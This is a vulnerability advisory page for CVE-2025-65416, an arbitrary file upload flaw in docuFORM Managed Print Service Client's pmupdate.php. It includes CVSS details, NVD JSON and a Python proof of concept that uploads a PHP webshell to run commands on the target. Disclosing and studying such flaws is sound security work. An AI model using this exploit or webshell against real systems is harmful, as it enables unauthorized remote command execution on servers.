Security Vulnerability Report
中文
CVE-2025-65416 CVSS 6.3 MEDIUM

CVE-2025-65416

Published: 2026-05-11 16:17:29
Last Modified: 2026-05-12 15:05:31

Description

docuFORM Managed Print Service Client 11.11c is vulnerable to arbitrary file upload via pmupdate.php.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

docuFORM Managed Print Service Client 11.11c

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL containing the vulnerable file url = "http://target-ip/pmupdate.php" # Path to the malicious file to upload (e.g., PHP webshell) file_path = "evil_shell.php" # Generate a simple PHP webshell content php_content = "<?php system($_GET['cmd']); ?>" # Prepare the files dictionary for the upload request # The parameter name 'file' might vary based on the application's form input name files = { 'file': (file_path, php_content, 'application/octet-stream') } try: # Send POST request to upload the file response = requests.post(url, files=files, timeout=10) if response.status_code == 200: print("[+] File uploaded successfully.") print("[+] Check the upload directory to access the shell.") else: print(f"[-] Upload failed with status code: {response.status_code}") print(response.text) except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65416", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:29.057", "lastModified": "2026-05-12T15:05:31.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "docuFORM Managed Print Service Client 11.11c is vulnerable to arbitrary file upload via pmupdate.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://ZeroBreach.de", "source": "[email protected]"}, {"url": "https://gist.github.com/ZeroBreach-GmbH/f94cad5b37f718d1b1cfee6ca0fe666b", "source": "[email protected]"}, {"url": "https://www.docuform.de/", "source": "[email protected]"}]}}